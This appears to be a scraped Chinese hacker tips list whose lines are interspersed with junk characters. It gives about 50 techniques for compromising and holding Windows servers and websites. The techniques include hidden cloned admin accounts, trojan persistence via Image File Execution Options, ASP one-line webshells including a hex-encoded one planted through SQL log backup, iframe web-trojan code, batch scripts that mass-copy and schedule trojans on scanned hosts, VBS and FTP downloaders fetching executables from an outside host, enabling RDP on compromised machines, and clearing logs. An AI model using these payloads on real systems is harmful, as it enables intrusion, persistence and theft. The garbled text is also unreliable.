Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 f9 E2 ^& R, F* A
cacls C:\windows\system32 /G hqw20:R
4 @- q9 S5 m, b; t思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入$ @0 j" R2 ?0 y4 c
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
6 p) ~) z( N3 b6 L y T+ j- W2 n, o, m! T8 f7 @9 R* w1 D
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% \/ ]2 `( t/ h; g4 m' p, |- q% C. U5 H+ p' z& b5 E
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
5 \) P: r1 _ Z) G/ k. _2 [6 t, f$ x, H) a
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
, Q" P, H `; e. m" d% e. J- \( ]! [; ` {* l) A p8 a& Z
5、利用INF文件来修改注册表; J2 G/ Z3 k7 C" Y2 V' G( z
[Version]) \% [* _4 O1 G4 d2 k
Signature="$CHICAGO$"! C+ U3 l# R* q! R3 X0 u# l5 `
[Defaultinstall]
0 Z- g5 F* ^7 S8 B/ O8 YaddREG=Ating" |" S0 \- ?" M1 A) E
[Ating]; G! j) l: o. X9 e' v/ J. N
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1", \, k, o" G2 V8 |$ e, N( D7 {. |7 S
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
: V% q6 O0 H9 X7 A# U+ @* a0 u+ Rrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径# V3 @1 e: c1 x: e5 t' i9 N6 H
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU' N0 u7 k6 F+ \# i) q
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
) G- i6 s9 G, U7 l7 dHKEY_CURRENT_CONFIG 简写为 HKCC
# K0 x( C' k2 m$ c6 k& ?; x2 o' z; ?0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值; R# W( f _/ k. s
"1"这里代表是写入或删除注册表键值中的具体数据" H. M7 o( E. j) _- ?5 t
3 L+ |1 K* ~( ?, l8 ]
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 t7 Y: ?6 o' f, e多了一步就是在防火墙里添加个端口,然后导出其键值
8 t ]* g1 F) x6 P& W[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
" a" w% A+ [: x( Z `5 A9 ~( Y1 T# {) O( c6 T; U8 Z" z$ X
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽: `" P3 @* }. m- }" F+ K! Q; n3 H% l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" I8 s' f3 }+ @: ` h' T& H0 w7 _6 t5 _; P# J9 q
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。& N( M5 h0 M0 ?7 R9 j
- X! J9 a# f( |) a
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
% T( k5 l3 m. B) o6 w9 m# v可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。/ ~8 h5 m* s* x6 Y5 N
1 W; H+ T3 s5 p# J& U1 Q/ m3 i
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
' f! e4 N& M9 R8 r1 T2 C. H1 h- G8 A& b
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,# K* B9 [( B7 ^6 i1 M R
用法:xsniff –pass –hide –log pass.txt& d& v; C$ T8 S1 |
: q' s% n! _' \9 w3 d7 B2 }12、google搜索的艺术
/ |) U- |: E5 R6 P* m& k, O搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True” ]0 a; U5 V! ~5 R6 y
或“字符串的语法错误”可以找到很多sql注入漏洞。1 u& W6 O) V C, [) M7 M
/ n9 ]: b% G4 r/ j0 V/ I, C
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。$ F- H4 ]0 T& T+ [5 _& R
2 w7 m ~8 \* ]" X* C- H14、cmd中输入 nc –vv –l –p 1987% i1 e! Q! T& R, X( _
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
4 }. _6 F5 x; w1 x% r* |0 m5 v8 y0 \% I' W
15、制作T++木马,先写个ating.hta文件,内容为9 C1 A- j1 g3 h
<script language="VBScript">7 R- s' Q3 t, q5 R1 B: J3 l' O& x
set wshshell=createobject ("wscript.shell" )6 Q( |# c# a$ q9 K! d1 e: ]; O6 }; S
a=wshshell.run("你马的名称",1)
. f% n* Y- T0 F- ^window.close
0 S9 M: P9 ^9 g) `" q2 U</script>: V! d. C& |. w3 {
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
$ i( F2 g$ Q1 X1 ^8 D
# ~' F& \2 M8 X4 K16、搜索栏里输入
) f# s, d. i) g% l" c( E( h关键字%'and 1=1 and '%'='
8 f9 n @% d. o# [" f% E关键字%'and 1=2 and '%'='' A* |. F) ?! V2 H1 L
比较不同处 可以作为注入的特征字符8 D% d! G& @1 b1 H( O
& v# l& q; o$ Y: r( u" e8 K17、挂马代码<html>
) s+ l2 i7 `) Y9 ]+ f9 P- ^<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>, I6 M2 n! w# L, n: K1 ^( C
</html>7 Y/ a. Q8 n8 U4 A" n& @+ ?
% }' c/ D4 V2 ?
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,( ~1 |8 m2 ]" l0 s# \
net localgroup administrators还是可以看出Guest是管理员来。' x" f9 {, [) w
0 d0 w& O4 e* f2 n) m
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
9 R! o8 i; n) @1 n" u: I% V+ U用法: 安装: instsrv.exe 服务名称 路径
0 `4 i& v9 j* Z# `- U卸载: instsrv.exe 服务名称 REMOVE- ]7 a; ^7 t3 R4 G3 U4 t; a
1 t0 J' o2 g* F- _- _0 _% ~' y# l
! g& D! }4 m5 ^0 k- L' L
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉+ W1 q- I3 M8 v* S/ @; i- Z; a
不能注入时要第一时间想到%5c暴库。6 E. {0 I+ }% Y M4 Y* n" o
1 d# a9 D4 T4 v3 F( b- t22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~2 b" H& M1 e7 e& @, ]/ v9 l
! }. p& g! L- P; Q9 X23、缺少xp_cmdshell时
& F" M& B0 B! A6 Z! q尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'6 i x T8 Z* A
假如恢复不成功,可以尝试直接加用户(针对开3389的)/ T3 R* h' m% h* K: f
declare @o int
; S& P# x$ z1 u# V5 eexec sp_oacreate 'wscript.shell',@o out7 u, I: f" i6 v
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
+ p2 W" x F! O) x3 Q5 e. E5 l& ]$ X
C0 l5 V- ?6 _+ Q24.批量种植木马.bat4 o+ \0 t. n+ K1 _' y9 [* ]
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
+ {& }1 L( x7 \7 J6 Sfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; D( v/ q3 w; V" w扫描地址.txt里每个主机名一行 用\\开头" I% K, h7 y3 v3 X& }/ D
. a$ t. G; J" ]; J
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
' Y9 F5 `4 ^: f* I( r: U+ C
5 R( N p. \6 g7 `2 k26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
7 A: R; n9 _1 B& ^1 A将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
9 Z: ^& T/ @: P Z.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
% u% c. S; I- j6 Y$ @; _7 O7 y. L4 @7 b+ n) D6 I f+ V
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP9 @. I- g; y' x) _9 F, G- F
然后用#clear logg和#clear line vty *删除日志
: D! n7 u- p; l4 u; [
2 j) Y0 g. w% c6 \28、电脑坏了省去重新安装系统的方法
- S4 J3 ^* i1 i3 \% e纯dos下执行,
4 K- ]- p5 A: r e* s/ t3 oxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config/ i- w. H) f* k; ? ^$ `
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
9 a [9 u& z) E2 g* a4 f# w0 z( W( w3 I P
29、解决TCP/IP筛选 在注册表里有三处,分别是:# w, l4 L2 F. p3 V7 H* w) n6 g9 t
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
+ W& a% L2 E2 XHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip2 e) ^0 q/ w5 D6 E' i0 i
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip9 A9 L# y3 x5 Q% S- o2 Q
分别用: O$ M2 |0 t3 m) c8 Q0 N
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
& D1 t% }$ A( B& pregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 W+ j0 ~$ Y, n' Zregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip$ s9 n% b* f7 u
命令来导出注册表项
3 D$ f5 t; p N8 D/ [然后把三个文件里的EnableSecurityFilters"=dword:00000001,
5 _1 t, ?. F" a9 e5 D! w改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: O+ Q/ Z: n8 }regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。8 F! n- I9 K, M4 p; n. D
- ~( s5 }1 T% l: y2 ]' z0 n30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U1 w% L& t) L0 r* x1 } i
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 \# \2 i- o8 f4 D! p
# m, `+ o6 A' ~; W0 c
31、全手工打造开3389工具( S2 y9 G. X4 x
打开记事本,编辑内容如下:
W( q0 H' r8 a: w% ]0 Zecho [Components] > c:\sql# f+ B" @( \7 \$ x7 D; y# J
echo TSEnable = on >> c:\sql1 V* f& z, Q2 C& Z- M s9 {4 H
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q& } {/ a3 k* v+ v1 q
编辑好后存为BAT文件,上传至肉鸡,执行
1 o3 G4 n* m& E& q5 k
1 ` s8 E3 S: e! y& a' T32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马' S& {7 u# L# ^" y5 T
2 B. N# [1 ~7 \+ @- x9 w1 B# a33、让服务器重启) A5 T8 |- l; j
写个bat死循环:. ?$ u7 r. x. M# X, l3 P6 d$ ]; O
@echo off
7 \2 d& l# c7 |3 n:loop1
1 Z9 S7 l5 j' J3 Z! i! h% ?cls* p- M- s# F: v# Z5 l
start cmd.exe
- E8 b' g6 J# f+ e' Xgoto loop1+ R- P5 `# p( D# M1 N
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启4 k1 Q0 k! [$ F, V+ q
2 A4 v' {6 E8 b x
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,, i1 {/ g! {$ s
@echo off* H* I' q5 w/ y8 L, y+ o
date /t >c:/3389.txt
, ~- R; N+ Y" d- c, R9 I9 `time /t >>c:/3389.txt( [4 ~& ~, m! x7 g2 F4 P% ^
attrib +s +h c:/3389.bat8 c% J- u' O. V- H# R/ V9 Q" h
attrib +s +h c:/3389.txt! I8 _9 B5 I( r' q2 x1 ~5 |' n
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt$ Q N1 g4 J& G# [( ?' ?
并保存为3389.bat/ i2 L; Q1 u/ C' i$ `9 s2 ?: v
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
- q9 J# r: ^2 Q2 A# p: k2 p
/ `" C$ M' a1 l7 Y, \35、有时候提不了权限的话,试试这个命令,在命令行里输入:( M% N" _8 @# R' W
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)1 _' M1 c( i2 y5 E% h) u( b
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
( S3 d! m9 v% k$ F$ c* U. ?4 H/ T* W% I* H w' i, n
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件) ~7 H6 D+ j- L: N& [6 {8 ]) C/ p
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
" w' M6 I1 \4 ^2 I3 @+ A9 R; q4 Becho 你的FTP账号 >>c:\1.bat //输入账号+ v* i( Z, ~4 A, U. t- w
echo 你的FTP密码 >>c:\1.bat //输入密码
1 s" L! \2 W: E7 v5 l- Q2 }' h. pecho bin >>c:\1.bat //登入
?3 m' R$ ~) K! b! h5 x* S5 Lecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( a, e8 [; [/ b# E
echo bye >>c:\1.bat //退出
" J, C/ S* l8 b4 Q然后执行ftp -s:c:\1.bat即可
( i- E7 p' E7 @% ~6 a! [
" m6 S$ }9 {+ ]# d37、修改注册表开3389两法
) z% p+ ]# R, y7 M$ o% D(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
& Y& g' o# ?2 Mecho Windows Registry Editor Version 5.00 >>3389.reg) Y' j" j% \4 b# `5 A
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
; W* ]9 v6 y( K) U3 z9 d9 Oecho "Enabled"="0" >>3389.reg
* i( f% f$ C4 ^% ?7 c! |echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
3 G `2 e/ e- bNT\CurrentVersion\Winlogon] >>3389.reg8 r% S! b/ T# S- H; y% ~ x
echo "ShutdownWithoutLogon"="0" >>3389.reg' p; @5 S1 U% M: k W
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
" ~0 H. q. ?3 I/ u2 v/ b>>3389.reg- A) }; O: p( p/ y0 q8 q" J
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg1 z5 M4 G) `2 K. M. c! r2 a% i+ i
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]: L: G: a- t2 D' ^( J0 P
>>3389.reg; M, r( y, A* H
echo "TSEnabled"=dword:00000001 >>3389.reg2 ?+ O& u0 y' P7 B# [# U0 y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
9 Q4 j( ~9 Z I* z0 b2 ~3 W5 r6 aecho "Start"=dword:00000002 >>3389.reg
2 C. }1 t6 g4 x2 D K7 V! V! {. [echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; P% K* _3 E; q. |
>>3389.reg; J+ y% C: z& e3 F4 |7 a+ i: S
echo "Start"=dword:00000002 >>3389.reg' k, r( m3 Y5 O( O6 V
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
: d5 W; S3 F% d' a8 N. G+ jecho "Hotkey"="1" >>3389.reg
+ J' {- ]+ x& J; k- F, S2 Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; Z' q5 n7 ^3 [5 \8 h& \! nServer\Wds\rdpwd\Tds\tcp] >>3389.reg% R( g" c# v! W! x$ g# y
echo "PortNumber"=dword:00000D3D >>3389.reg4 W, G+ e+ F: K X" k3 M! ]1 I
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. G$ j/ `4 Z! ^' j
Server\WinStations\RDP-Tcp] >>3389.reg
: p9 A- k+ x; q2 w& ]3 L: |echo "PortNumber"=dword:00000D3D >>3389.reg, f7 x D& f6 v6 g; T
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
( C9 j* T+ i; A6 M( R4 c2 q(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)& Z' g, {: `4 h+ S0 }% f* Q
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效7 h; c( J+ w# ]0 |9 Z1 _
(2)winxp和win2003终端开启" z {7 E, n- ?. [
用以下ECHO代码写一个REG文件:$ M. c% w. V( {* _7 J9 w
echo Windows Registry Editor Version 5.00>>3389.reg
% ]7 d6 A" Q$ x- Kecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
7 C1 _* E! b3 b3 @! y/ t, H' AServer]>>3389.reg _* p- G" {* P0 t( H) s
echo "fDenyTSConnections"=dword:00000000>>3389.reg
- K2 u! o/ n( Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal n6 c3 f( q$ ~5 ^
Server\Wds\rdpwd\Tds\tcp]>>3389.reg8 G$ {3 M3 l( O: p
echo "PortNumber"=dword:00000d3d>>3389.reg' d' y9 n! w( {* A
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" Y3 K6 ]6 N0 M) e) @Server\WinStations\RDP-Tcp]>>3389.reg
1 O) w; W$ n$ b# Secho "PortNumber"=dword:00000d3d>>3389.reg& |" O# A; F Y1 _( K
然后regedit /s 3389.reg del 3389.reg
" A. I) ~ ~5 F# G- q! p1 v+ mXP下不论开终端还是改终端端口都不需重启
% J0 d, S$ T, y9 s/ |- n) [0 h* o/ F) I9 I1 l& S
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
3 }$ P8 r0 M) _用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa': I) |$ v7 E. V V [
! J9 Z3 M4 {! Y7 R2 C8 B# ]
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
8 p8 Z) I7 X) _5 R4 g(1)数据库文件名应复杂并要有特殊字符
) {! b9 G8 n* T7 r7 q( U(2)不要把数据库名称写在conn.asp里,要用ODBC数据源% v% r% n$ I. L% M- F
将conn.asp文档中的. r" v; V' J5 ~+ \$ Y9 A9 o2 ~1 O# _
DBPath = Server.MapPath("数据库.mdb")
4 n) i! ~3 z+ z% U4 Nconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
0 ^3 Y* k5 Z- T+ x3 O0 A% t. g& H) K e" O
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置5 m8 T% R" B, {# [7 c8 G7 r: O
(3)不放在WEB目录里' T% z. Z" u4 i$ E' f
% O# Z* V1 R$ E0 S& p( Y! G40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉9 D) g* ` B( d8 f
可以写两个bat文件
( v& Z- q9 U/ K( f D- W0 ^- R7 B@echo off: F3 I! k( ^ s5 P5 h: F2 T+ o( O
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe4 V3 o: x3 c, E& \
@del c:\winnt\system32\query.exe
! E" E9 ]; _% V( R; }- ~@del %SYSTEMROOT%\system32\dllcache\query.exe5 S9 s/ G& r& ^/ E! M
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
# Q6 O( Y* l, ^1 B8 ^. H/ V% v& B' C6 g, w* H
@echo off
4 |6 ~ o: V6 @1 V: S0 J/ T@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe3 B( `6 d- v. V I$ X
@del c:\winnt\system32\tsadmin.exe4 d" S w. M2 j
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
6 p" p8 |) v' z/ C
) b8 h$ Y% ?$ w6 N41、映射对方盘符
7 @+ z0 Z" R3 m4 c6 ^telnet到他的机器上,
1 |3 w5 y* o. X! Vnet share 查看有没有默认共享 如果没有,那么就接着运行
: A" w- G1 w4 V+ m/ a9 Inet share c$=c:
/ J) ]7 d% s( Unet share现在有c$* |! d8 H/ S3 _, @
在自己的机器上运行" D: M! W) x1 O
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K2 L% j9 v B' _- ?# E. i' t
& J; |$ v" E, q42、一些很有用的老知识
* O* `7 G6 h2 P k7 Y& _% F& m& ztype c:\boot.ini ( 查看系统版本 )6 E4 t4 f& o/ R% p6 n
net start (查看已经启动的服务)( V( d- e1 _, B, x# u* Y9 k
query user ( 查看当前终端连接 ), ?8 g( L* Z4 z" m5 Y, d: d r1 C
net user ( 查看当前用户 )5 [& A8 u$ _" T# A
net user 用户 密码/add ( 建立账号 )) E& R8 X' t' B" m
net localgroup administrators 用户 /add (提升某用户为管理员)
; D9 o# H) W# J- {, g- C; _! n' Sipconfig -all ( 查看IP什么的 )
$ R/ {& o" G: L: F3 s" J8 k; Anetstat -an ( 查看当前网络状态 )9 b' U8 P0 s' t% q5 D. j l
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码), E! K3 _- t- u' S
克隆时Administrator对应1F4
) N8 ^! |: x# T. D$ u7 L4 \guest对应1F5
. ^/ t1 q9 x9 ^/ M* `& ^" U+ btsinternetuser对应3E8
/ j8 \& _% p6 S! m2 A- u" u9 E3 l( k3 B' Q) `
43、如果对方没开3389,但是装了Remote Administrator Service* K, `) |- F8 F+ o# H
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
* ?9 ^7 W+ }, F1 B- P解释:用serv-u漏洞导入自己配制好的radmin的注册表信息# M; \& q( b' e; K. Y- L
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"- x2 M$ d$ L9 M \, t# E
+ m/ {5 l9 ]; W
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)" F' Y9 S$ Z' V- b' O
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
+ k4 E- R( n1 Z
$ T. l$ Z6 V: B45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
! W9 h5 A# z& L0 cecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
" i) l! b! \0 P^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =5 c8 a X# I3 V3 q! C3 X
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =: |9 r1 h9 ~) {; s4 P
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
: b: p8 A0 s4 v: |8 o8 z& x ^(这是完整的一句话,其中没有换行符)4 O+ d4 \% v$ ?" k* a$ l
然后下载:
6 C) \( k! a& S8 _8 B! u: A% R, @5 t0 wcscript down.vbs http://www.hack520.org/hack.exe hack.exe
* k% [7 S5 o9 H( V& K4 F# A9 q* n$ n* R
46、一句话木马成功依赖于两个条件:
0 F- G3 |# R6 y' Q1、服务端没有禁止adodb.Stream或FSO组件1 O; e3 ]( G5 X/ Q1 L, u
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
7 y7 b% {% I+ r; p& l- d& D
% d1 U: h7 D$ f( J- E47、利用DB_OWNER权限进行手工备份一句话木马的代码:
% Y w3 O, x7 P' O( Y: m;alter database utsz set RECOVERY FULL--" ^, m1 i# N: a% `" F6 b
;create table cmd (a image)--# `+ X$ L$ k9 v! i3 }( N
;backup log utsz to disk = 'D:\cmd' with init--$ [% F9 x* _ W5 U0 o) L' G
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--2 G) w. }8 S5 U) X. J$ W! U- l
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--, o. e3 n7 |9 L5 Z, g+ [
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。5 n4 {) W; D8 y3 q* Z" B
+ {0 h4 D6 o' k/ m& _ t48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置: u8 |( U; b$ X: D) p
% [& Z- x8 [% r8 y/ |
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options# {, S V( Y+ w$ l4 O* E* e% p0 t
所有会话用 'all'。/ T p& y8 m3 \7 E3 f4 B
-s sessionid 列出会话的信息。
" d# R L) @! C3 C7 _; n-k sessionid 终止会话。$ j7 B3 G i, X. D; T
-m sessionid 发送消息到会话。
4 J7 T( e* |# A2 y( e: c/ L' t
. V8 t, O+ S v& M. tconfig 配置 telnet 服务器参数。
- s0 r+ a2 _& }. W& m# S5 ?8 S2 M8 r% r0 N) \. l
common_options 为:& {/ _0 l5 m8 l7 |8 }
-u user 指定要使用其凭据的用户& W/ l" s/ Y. O, Z6 z, s
-p password 用户密码
( Z, l2 Q5 Y! ^1 C
1 a, V! `7 m8 q$ T; \config_options 为:
" m, O. _; C0 l& ~dom = domain 设定用户的默认域
& ?& ^' W$ D$ U1 fctrlakeymap = yes|no 设定 ALT 键的映射
( l# ?. c8 @0 g' P. gtimeout = hh:mm:ss 设定空闲会话超时值
) x, s- l3 _7 Z1 Z/ V, f. z& ~timeoutactive = yes|no 启用空闲会话。* F2 X+ x2 b" o# l# p5 j
maxfail = attempts 设定断开前失败的登录企图数。; t$ j& C# q+ I4 e2 _
maxconn = connections 设定最大连接数。
" W+ w; s ?& i; c0 i3 p& Uport = number 设定 telnet 端口。3 m8 | m2 n, D3 s+ x; W8 U! z- m
sec = [+/-]NTLM [+/-]passwd' O# z- ~3 p! h7 T
设定身份验证机构
" `& M& n7 J* w! ~( D u2 ffname = file 指定审计文件名。
! B) i" S* B7 Bfsize = size 指定审计文件的最大尺寸(MB)。 D6 O2 `- L- N# s9 g' p# T+ J& |/ r
mode = console|stream 指定操作模式。& g8 j- F7 u& g: s
auditlocation = eventlog|file|both, s: q" l' V1 K+ [$ L
指定记录地点6 l* x: y1 m* t3 Q# @9 s- R0 \
audit = [+/-]user [+/-]fail [+/-]admin1 C6 \8 a# y' X; R
" t+ P& h* @, q5 e6 D5 m* V/ r
49、例如:在IE上访问:
/ n# z9 _. ]" r* c3 Y% R; Y( Mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/% _/ ~) P m1 C" `0 m% X. x
hack.txt里面的代码是:
, M+ v1 t& p( g" p* X7 z<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
5 B8 q: x- c! f b8 h' T把这个hack.txt发到你空间就可以了!( N8 c$ [" [) P
这个可以利用来做网马哦!
* S4 ~. Q" S, F& A0 a3 t8 X" S/ l g
50、autorun的病毒可以通过手动限制!
* a0 E: Q: }& M) I1 z1 L1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!6 W& Y8 C. K5 Q! Z% e1 i' V' e
2,打开盘符用右键打开!切忌双击盘符~
5 P' C0 ]- ?/ L3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
/ b& o0 M7 `) Q8 e0 a/ V9 ^' d0 g7 C: E% z# U5 f- A2 Y( k
51、log备份时的一句话木马:
6 K6 Z* f3 {+ x2 va).<%%25Execute(request("go"))%%25>
I# p5 B& C* g d0 a9 L3 q- Qb).<%Execute(request("go"))%>2 |2 Y, q7 b. a4 G8 L2 t1 v7 N" K
c).%><%execute request("go")%><%
7 Z! w4 J/ x$ y& ]3 Rd).<script language=VBScript runat=server>execute request("sb")</Script>
% ?- K+ S% N3 X e1 D0 O2 Ge).<%25Execute(request("l"))%25>
: \# g; T* E. ~- q2 ?6 xf).<%if request("cmd")<>"" then execute request("pass")%>! D# R$ f2 h7 X2 J
& N1 r$ p* ]7 B) X2 W. d
52、at "12:17" /interactive cmd
! E+ E1 G, J: E! w5 s执行后可以用AT命令查看新加的任务. V, r5 M- F' d4 j8 Q
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
& d7 A+ q: W. y
